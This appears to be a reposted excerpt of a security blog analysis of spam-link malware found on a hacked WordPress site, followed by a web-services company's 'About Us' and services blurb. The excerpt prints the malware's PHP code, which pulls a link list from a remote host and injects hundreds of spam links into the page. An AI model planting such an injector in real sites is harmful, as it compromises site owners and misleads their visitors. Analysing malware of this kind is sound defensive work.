Massive Google Colaboratory Abuse: Gambling and Subscription Scam

This investigation started with a small and quite simple piece of PHP malware found on a hacked website.

We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file.


$lines = file(‘https://4ip[.]su/db/links.txt’); 


$data = array_rand($lines, 900); 

echo ‘<p>’;

foreach($data as $value) {

$rand = substr(md5(microtime()),rand(0,26),6);

echo ‘<a href=”‘.$lines[$value].'”>’.$rand.'</a> ‘;


echo ‘</p>’;


This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page.

Continue reading Massive Google Colaboratory Abuse: Gambling and Subscription Scam at .

Posted in

About Us

I believe that everyone should have a mechanic that they can trust and after spending several years helping out various customers for large companies I've seen my fair share of issues.

Honesty, Integrity, and Compassion are what we share with everyone that we work with. Stop scouring the internet for help and see how we can help you today.

Our Services

Website Migrations

Plugin & Theme Updates

IDX Broker Customizations

Facebook Chatbots

DNS & Email Integrations